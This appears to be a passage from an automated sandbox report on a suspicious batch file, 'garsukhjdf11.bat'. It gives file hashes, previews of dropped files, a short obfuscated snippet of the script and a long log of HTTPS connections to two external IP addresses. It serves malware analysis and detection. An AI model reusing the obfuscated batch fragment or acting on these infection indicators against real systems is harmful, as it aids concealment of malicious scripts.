                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                Size (bytes):14
                                                                                                                                                                                                                Entropy (8bit):3.521640636343319
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:Mrv:gv
                                                                                                                                                                                                                MD5:CE585C6BA32AC17652D2345118536F9C
                                                                                                                                                                                                                SHA1:BE0E41B3690C42E4C0CDB53D53FC544FB46B758D
                                                                                                                                                                                                                SHA-256:589C942E748EA16DC86923C4391092707CE22315EB01CB85B0988C6762AA0ED3
                                                                                                                                                                                                                SHA-512:D397EDA475D6853CE5CC28887690DDD5F8891BE43767CDB666396580687F901FB6F0CC572AFA18BDE1468A77E8397812009C954F386C8F69CC0678E1253D5752
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:ECHO is off...
                                                                                                                                                                                                                Process:C:\Windows\System32\find.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):36
                                                                                                                                                                                                                Entropy (8bit):3.8956388075276664
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:gOmAe9qQn:xm/
                                                                                                                                                                                                                MD5:89D484A82D15549C8F4BF2B4D4F1E924
                                                                                                                                                                                                                SHA1:58F49E997A58A17C2902E08026BAC2DD16A34B1B
                                                                                                                                                                                                                SHA-256:040AE1183CD6102AC612B2D88C2816B358FDC4743BC9CD05376E797595167B40
                                                                                                                                                                                                                SHA-512:C0C920A9369FF9E28C9DAE6CA21AE7A1F9A79F2F4F8F97E247D133700FC446CEAA2C6C40116DE644CEA9336D9064792F3AD7011EBCBF5B6675779C57590F167B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:FIND: Parameter format not correct..
                                                                                                                                                                                                                File type:Unicode text, UTF-16, little-endian text, with very long lines (16858), with no line terminators
                                                                                                                                                                                                                Entropy (8bit):5.670062776683649
                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                • Text - UTF-16 (LE) encoded (2002/1) 66.67%
                                                                                                                                                                                                                • MP3 audio (1001/1) 33.33%
                                                                                                                                                                                                                File name:garsukhjdf11.bat
                                                                                                                                                                                                                File size:33'719 bytes
                                                                                                                                                                                                                MD5:92529c13bb6162d355399b1585919e7a
                                                                                                                                                                                                                SHA1:f41a93eadc02f2eca672d7b9caf51862cfaff4a1
                                                                                                                                                                                                                SHA256:bb4a859dc82bb1e21294e65b574e6fcce8d0ed2cfc36b01028f62a95b09ea8b2
                                                                                                                                                                                                                SHA512:089647c9cb8f38192996653c0f5666ac1da989f603f085194320ded3e83836555ccee631af35adf88d13afc514578102ef5d08e4929380460ca2785afd9c37c1
                                                                                                                                                                                                                SSDEEP:384:eCdkcEAkO0xKyocPSXF4ZNwcKfMr60wFGmxg/o++6trVBdL802V9YAul:jd5EZO0fPYFKNwcK0r60wFf6o57y
                                                                                                                                                                                                                TLSH:4DE2F0D117CF6F5E60D3AE1810B815A6124FBE7D38BE296B86B4328F2F7868E4135471
                                                                                                                                                                                                                File Content Preview:....>nul 2>&1 &cls.;@@e%(.........)...( ..._...)......(......_...)......(......_^...)...(........)(.........)%%(.........)...(......_...)...(.........)(...^......)(.........)...( ..._...)...%%...(......_...)......( ..._...)...(.........)(........)...( ...
                                                                                                                                                                                                                Icon Hash:9686878b929a9886
                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                Dec 12, 2024 12:59:11.544744968 CET49706443192.168.2.5162.125.69.18
                                                                                                                                                                                                                Dec 12, 2024 12:59:11.544794083 CET44349706162.125.69.18192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:11.544898033 CET49706443192.168.2.5162.125.69.18
                                                                                                                                                                                                                Dec 12, 2024 12:59:11.552532911 CET49706443192.168.2.5162.125.69.18
                                                                                                                                                                                                                Dec 12, 2024 12:59:11.552547932 CET44349706162.125.69.18192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:12.991652966 CET44349706162.125.69.18192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:12.991833925 CET49706443192.168.2.5162.125.69.18
                                                                                                                                                                                                                Dec 12, 2024 12:59:12.994872093 CET49706443192.168.2.5162.125.69.18
                                                                                                                                                                                                                Dec 12, 2024 12:59:12.994883060 CET44349706162.125.69.18192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:12.995225906 CET44349706162.125.69.18192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:13.005707026 CET49706443192.168.2.5162.125.69.18
                                                                                                                                                                                                                Dec 12, 2024 12:59:13.051338911 CET44349706162.125.69.18192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:14.182888031 CET44349706162.125.69.18192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:14.182970047 CET44349706162.125.69.18192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:14.183063984 CET49706443192.168.2.5162.125.69.18
                                                                                                                                                                                                                Dec 12, 2024 12:59:14.183084965 CET49706443192.168.2.5162.125.69.18
                                                                                                                                                                                                                Dec 12, 2024 12:59:14.187849045 CET49706443192.168.2.5162.125.69.18
                                                                                                                                                                                                                Dec 12, 2024 12:59:19.314004898 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:19.314069986 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:19.314152002 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:19.316858053 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:19.316871881 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:20.533418894 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:20.533515930 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:20.536663055 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:20.536673069 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:20.536876917 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:20.542246103 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:20.587340117 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.144350052 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.144409895 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.144488096 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.144519091 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.144598007 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.144612074 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.144717932 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.152365923 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.152456045 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.152487993 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.160535097 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.160635948 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.160645962 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.168836117 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.168910027 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.168916941 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.185545921 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.185879946 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.185889959 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.238430977 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.264091015 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.316579103 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.336157084 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.341366053 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.341519117 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.341609955 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.341640949 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.341726065 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.348975897 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.356426954 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.357899904 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.357908964 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.364799976 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.367988110 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.367996931 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.372410059 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.373888016 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.373898983 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.379785061 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.380259991 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.380268097 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.387206078 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.389906883 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.389914989 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.402483940 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.402595997 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.402662039 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.402669907 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.402730942 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.408925056 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.415350914 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.415436029 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.415532112 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.415541887 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.415585995 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.421847105 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.428373098 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.429874897 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.429883003 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.434772015 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.437881947 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.437889099 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.488502979 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.488509893 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.535366058 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.541095972 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.541107893 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.541193008 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.547003984 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.547019005 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.547089100 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.551440954 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.555589914 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.555671930 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.555686951 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.555746078 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.563838959 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.563849926 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.563910007 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.571269989 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.571291924 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.571369886 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.575016975 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.575031996 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.575093985 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.582813025 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.582823038 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.582895041 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.589180946 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.589242935 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.594435930 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.594508886 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.597109079 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.597166061 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.602250099 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.602310896 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.605055094 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.605123997 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.610336065 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.610399008 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.615411997 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.615485907 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.620626926 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.620687962 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.737332106 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.737463951 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.738018990 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.738157988 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.738677025 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.738734007 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.746436119 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.746529102 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.749355078 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.749430895 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.753808022 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.753906012 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.758301020 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.758387089 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.762006998 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.762130976 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.763849020 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.763964891 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.768563986 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.768630028 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.770662069 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.770720005 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.774988890 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.775084019 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.779210091 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.779273033 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.783951044 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.784013987 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.787143946 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.787213087 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.791011095 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.791071892 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.795470953 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.795547962 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.798438072 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.798506021 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.799864054 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.799941063 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.803725004 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.803809881 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.807138920 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.807234049 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.811449051 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.811517954 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.813659906 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.813740969 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.817789078 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.817884922 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.827630997 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.827649117 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.827666998 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.827694893 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.827738047 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.827748060 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.879019022 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.930279970 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.930290937 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.930327892 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.930361032 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.930376053 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.930406094 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.930419922 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.943146944 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.943175077 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.943218946 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.943227053 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.943248034 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.943270922 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.953133106 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.953155041 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.953206062 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.953213930 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.953236103 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.953264952 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.963679075 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.963706017 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.963758945 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.963767052 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.963857889 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.963917017 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.973988056 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.974008083 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.974065065 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.974071980 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.974087954 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.974137068 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.984937906 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.984960079 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.985054016 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.985064983 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.985125065 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.996000051 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.996018887 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.996104002 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.996112108 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:21.996177912 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:22.005376101 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:22.005395889 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:22.005459070 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:22.005465984 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:22.005500078 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:22.009876013 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:22.120738983 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:22.120767117 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:22.120845079 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:22.120855093 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:22.120898962 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:22.126955986 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:22.127012014 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:22.127053976 CET65363443192.168.2.5172.65.251.78
                                                                                                                                                                                                                Dec 12, 2024 12:59:22.127063036 CET44365363172.65.251.78192.168.2.5
                                                                                                                                                                                                                Dec 12, 2024 12:59:22.127127886 CET65363443192.168.2.5172.65.251.78
